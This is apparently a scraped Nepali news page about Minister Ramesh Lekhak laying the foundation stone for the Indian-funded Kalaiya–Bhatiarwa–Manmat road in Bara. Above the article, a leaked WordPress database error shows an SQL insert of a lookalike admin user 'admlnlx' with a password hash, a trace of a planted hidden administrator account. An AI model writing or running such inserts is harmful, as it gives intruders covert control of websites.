WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLB4t5XzLZjxMIZDmrc8.oNy3.68kT/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 13:03:28', '', 'admlnlx', 'admlnlx')
कलैया,माघ १-
भौतिक पूर्वाधार तथा यातायातमन्त्री रमेश लेखकले बाराको भटिअर्वा गाउँमा कलैया–भटिअर्या– मानमत सडकको शुक्रबार शिलान्यास गरेका छन्।भारतीय अनुदान सहयोगबाट करिब २९ किमी लामो सात मिटर चौडाइको सडक ७७ करोड ५५ लाख रूपैयाँको लागतमा बन्ने भएको छ ।
सो अवसरमा मन्त्री लेखकले बाराको सिम्रौनगढ–तामागढी सडक र गण्डक नहरको बाटो समेत कालोपत्र गर्ने तयारी भइरहेको जानकारी दिए ।